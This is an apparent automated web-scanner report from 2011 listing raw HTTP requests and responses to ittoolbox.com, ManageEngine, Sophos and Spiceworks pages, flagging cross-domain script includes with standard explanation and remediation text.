GET /RealMedia/ads/click_lx.ads/TLBXittoolbox/technology/1{TIME_DATE_STAMP}/L24/664329713/Top1/BBN/Default_Toolbox_Universal_Multi/whitepaper_ldrbrd_ad.jpg/7263485738303033424c73414270536c?x HTTP/1.1 Host: oasc05134.247realmedia.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: NSC_d17efm_qppm_iuuq=ffffffff09419e3845525d5f4f58455e445a4a423660; OAX=rcHW8003BLsABpSl;
Response
HTTP/1.1 302 Found Date: Wed, 26 Jan 2011 14:55:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Location: http://it.toolbox.com/companies/white-papers/ Content-Length: 322 Keep-Alive: timeout=60 Connection: Keep-Alive Content-Type: text/html; charset=iso-8859-1
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>302 Found</title> </head><body> <h1>Found</h1> <p>The document has moved <a href="http://it.toolbox.com/companies/white-papers/">here</a> ...[SNIP]...
GET /products/desktop-central/index.html?ibtoolbox2 HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:02 GMT Server: Apache Last-Modified: Mon, 24 Jan 2011 13:46:19 GMT ETag: "16060-d315c0c0" Accept-Ranges: bytes Content-Length: 90208 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:02 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><!-- Instan ...[SNIP]... <br /> <a href="http://www.site24x7.com" class="secondlevellink" title="Website Monitoring" name="Website-Monitoring">Website Monitoring</a> ...[SNIP]... <td width="90" align="center" valign="bottom"><a target="_blank" href="http://www.pekinhospital.org"> <img height="99" border="0" width="77" title="Pekin Hospital" alt="Pekin Hospital" src="http://www.manageengine.com/products/desktop-central/images/dantharp_testimonial_index.gif"/> ...[SNIP]... <div class="demo-buynow-buttons"> <a href="http://demo.desktopcentral.com/" title="Desktop Management - Live Demo" name="Desktop-Management-Live-Demo" class="demo-button">Desktop Management - Live Demo</a> ...[SNIP]... <span style="display:block" id="spanimg1"><a target="_blank" href="http://windowsitpro.com/article/articleid/100673/new--improved.html"><img id="imgId1" src="http://www.manageengine.com/products/desktop-central/images/winitpro_logo.gif" alt="Desktop Central News in Windows IT Pro" width="205" height="61" /> ...[SNIP]... <span style="display:none" id="spanimg2"><a href="http://www.networkproductsguide.com/best/index.html"><img style="padding-top:5px; vertical-align:middle" id="imgId2" src="http://www.manageengine.com/products/desktop-central/images/2009BestProducts.jpg" width="60" height="85" alt="2009 Best Products" /> ...[SNIP]... <map name="Social" id="Social"><area shape="rect" coords="0,1,15,14" href="http://twitter.com/desktopcentral" target="_blank" alt="Follow us on Twitter" /> <area shape="rect" coords="21,0,35,14" href="http://blogs.desktopcentral.com" target="_blank" alt="Desktop Central Blogs" /> <area shape="rect" coords="40,0,53,14" href="http://www.manageengine.com/products/desktop-central/demo/desktop-management-videos.html" target="_blank" alt="Desktop Central Videos on Youtube" /> ...[SNIP]... </span> <a href="http://www.zohocorp.com/"><strong> ...[SNIP]... </a>. All rights reserved. <a href="http://www.webnms.com" title="WebNMS Home" name="WebNMS-Home">WebNMS Home</a> ...[SNIP]... </script> <script type="text/javascript" language="javascript" src="http://t5.trackalyzer.com/trackalyze.js"></script> ...[SNIP]... <area shape="rect" coords="224,1,484,53" alt="Desktop Power Management" title="Desktop Power Management" href="desktop-power-management.html?itop" /> <area shape="rect" coords="484,1,722,53" alt="Desktop Central is Windows 7 Compatible" title="Desktop Central is Windows 7 Compatible" href="http://www.microsoft.com/windows/compatibility/windows-7/en-us/Details.aspx?type=Software&p=Desktop%20Central&v=Zoho%20Corporation&uid=7&pf=0&pi=6&s=desktop&os=32-bit" target="_blank" /> </map> ...[SNIP]...
GET /products/service-desk/index.html?ibad HTTP/1.1 Host: www.manageengine.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:03 GMT Server: Apache Last-Modified: Tue, 25 Jan 2011 15:24:32 GMT ETag: "fa73-502d2c00" Accept-Ranges: bytes Content-Length: 64115 Cache-Control: max-age=604800 Expires: Wed, 02 Feb 2011 14:57:03 GMT Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
The response contains the following links to other domains:
http://twitter.com/gcluley/lists/sophos
http://www.facebook.com/SophosSecurity
http://www.linkedin.com/companies/sophos/
http://www.sophos.cn/
http://www.sophos.de/
http://www.sophos.fr/
http://www.sophos.it/
http://www.youtube.com/user/SophosLabs
Request
GET /lp/compliancefordummies/?utm_source=Non-campaign&utm_medium=Web-banner&utm_campaign=NA-WB-CFD-Marchex HTTP/1.1 Host: www.sophos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <title>Sophos - Request your free copy of Compliance for Dummies</title> <!-- head ...[SNIP]... <div style="float: right; width: 136px; margin-right: 5px; height: 35px;">
GET /features/?swsrc=marchex-test-campaign HTTP/1.1 Host: www.spiceworks.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Wed, 26 Jan 2011 14:57:14 GMT Server: Apache/2.2.3 (CentOS) Set-Cookie: swcls=173.193.214.243.1296053834736649; path=/; domain=.spiceworks.com X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 20541
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.
If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.
Issue remediation
Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.
GET / HTTP/1.1 Host: businessintelligence.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 79300 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=lgzfjg45p5p4ttjbryycmjiv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Business In ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/bi.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=BI;kw=BusinessIntelligence;kw=BusinessObjects;kw=reporting;kw=onlineanalyticalprocessing;kw=analytics;kw=datamining;kw=businessperformancemanagement;kw=benchmarking;kw=textmining;kw=predictiveanalytics;kw=dashboard;kw=scorecard;kw=Actuate;kw=Cognos;kw=SPSS;kw=MicroStrategy;kw=Hyperion;sz=728x90,468x60,1x1;tile=6;ord=48644884?">
GET / HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 70865 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ev3vw13ts4uun2552nfwiz45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:19 GMT Connection: close
GET /blogs/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 85344 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=sthdbdnv4isdq155nf5krjic; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:21 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=ITManagement;kw=CareerDevelopment;kw=outsourcing;kw=offshoring;kw=ROI;kw=eCommerce;kw=GreenIT;kw=ITWorkforceManagement;kw=BPM;kw=BusinessProcessManagement;kw=Compliance;kw=ITPortfolioManagement;kw=SOXITCompliance;sz=728x90,468x60,1x1;tile=6;ord=623022013?">
GET /directory/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 52564 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=el0hjp55tk5oie55qdseux55; path=/; HttpOnly Set-Cookie: iNa=is=0&cc=- &st=-&ct=-&pc=- <=0&lo=0; domain=.ittoolbox.com; expires=Tue, 26-Apr-2011 13:49:31 GMT; path=/ X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:34 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=2053501670?">
GET /documents/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 28204 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=kqpydg55prajw345gnpd1jaz; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1615285009?">
GET /events/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 38997 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=uu0vpmjgqupns155oiaxug55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1568464939?">
GET /groups/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 131235 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ttokbo25mimfaly03xopef55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:23 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/groups;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1367886247?">
GET /research/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 96466 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=mqlx3145uwj1pknllf1r5455; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:29 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=552739168?">
GET /subscriptions/ HTTP/1.1 Host: cio.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 27989 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vzkaha55kglahd45pvrgqp2s; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:33 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> IT Manageme ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/cio.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1402550479?">
GET / HTTP/1.1 Host: cloud.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 56007 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=edr0xeykfwnzlf55wgzg3zyo; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:35 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/it.cloud/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=2055110610?">
GET / HTTP/1.1 Host: crm.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 82725 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=2ge150zsf5orj4451zm2nlzm; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:39 GMT Connection: close
GET / HTTP/1.1 Host: database.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 84329 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ra1d4q2rs54sn03stt4bip55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:38 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Database Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/database.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=Database;kw=DBMS;kw=RDBMS;kw=DB2;kw=DB2LUW;kw=DB2z%2fOS;kw=microsoftaccess;kw=access;kw=development;kw=dBase;kw=enterpriseDB;kw=microsoftExcel;kw=FilemakerPro;kw=IBMIMS;kw=Informix;kw=Ingres;kw=MySQL;kw=PostgreSQL;kw=QuestToad;kw=SQL;kw=SQLserver;kw=sybase;kw=asp;kw=compliance;kw=projectmanagement;kw=DBMSvendorselection;kw=masterdatamanagementvendorselection;kw=system;kw=developer;kw=hosting;kw=administration;kw=migration;kw=management;kw=server;kw=software;sz=728x90,468x60,1x1;tile=6;ord=2021326666?">
GET / HTTP/1.1 Host: datacenter.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 60090 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=wgr3vvq5eg30jq45klsivcfv; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:41 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Toolbox for ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/datacenter.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=578106909?">
GET / HTTP/1.1 Host: datawarehouse.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 72791 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=ivrlt045uzzhvb45t5knzy55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Data Wareho ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/dw.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=ELT;kw=extract;kw=load;kw=transform;kw=datawarehouse;kw=datamart;kw=dataappliance;kw=AbInitio;kw=Informatica;kw=DataStage;kw=Teradata;kw=Hyperion;kw=datawarehouseadministration;sz=728x90,468x60,1x1;tile=6;ord=561045215?">
GET / HTTP/1.1 Host: eai.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 71618 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=4d5wgz45zmrk1tj0f23ykr55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:42 GMT Connection: close
GET / HTTP/1.1 Host: emergingtech.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 47575 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=vhyrxg55jlanffvxx24ekzek; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:43 GMT Connection: close
GET / HTTP/1.1 Host: erp.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 74629 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=11lky4ffifxs05zpvlu4qv55; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:46 GMT Connection: close
GET / HTTP/1.1 Host: finance.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 81717 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:49 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Finance Com ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/finance.toolbox.com/;pos=horizlarge;role=0;cs=0;ind=0;kw=;sz=728x90,468x60,1x1;tile=6;ord=1222312195?">
GET / HTTP/1.1 Host: hardware.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 78653 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=3wjpn4yajv3hcfa0fidd3prk; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:49:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head><title> Hardware Co ...[SNIP]... <link rel="shortcut icon" href="http://images.ittoolbox.com/favicon.ico" /> <script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script> ...[SNIP]... <div align="center" style="margin-top:inherit;margin-bottom:5px"> <script src="http://ad.doubleclick.net/adj/hardware.ittoolbox/;pos=horizlarge;role=0;cs=0;ind=0;kw=hardware;kw=cpu;kw=processors;kw=diskdrives;kw=usb;kw=firewire;kw=memory;kw=storage;kw=motherboards;kw=power;kw=supply;kw=routers;kw=modems;kw=network;kw=security;kw=displays;kw=monitors;kw=graphics;kw=cards;kw=gaming;kw=keyboards;kw=peripheral;kw=pccards;kw=printers;kw=scanners;kw=speakers;kw=audio;kw=webcams;kw=video;kw=laptops;kw=mainframe;kw=servers;kw=tablets;kw=handheld;kw=workstations;kw=virtualization;kw=storage;kw=solidstatedrives;kw=media;kw=servers;kw=dell;kw=apple;kw=hp;kw=ibm;kw=intel;kw=pc;kw=sun;kw=blades;kw=datacenters;kw=pdsa;kw=desktops;kw=;sz=728x90,468x60,1x1;tile=6;ord=1525988634?">
GET / HTTP/1.1 Host: infor.ittoolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 54154 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 Set-Cookie: ASP.NET_SessionId=laxlg3yxtwdispubbh1xwd45; path=/; HttpOnly X-Powered-By: ASP.NET Date: Wed, 26 Jan 2011 14:50:00 GMT Connection: close
GET /groups/ HTTP/1.1 Host: it.toolbox.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_cc=true; __utmz=53162736.1296053390.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); s_vi=[CS]v1|26A01A3D851D2B4A-60000137A054F13C[CE]; s_sq=%5B%5BB%5D%5D; __utma=53162736.2076394333.1296053390.1296053390.1296053390.1; __utmc=53162736; __utmb=53162736;
Response
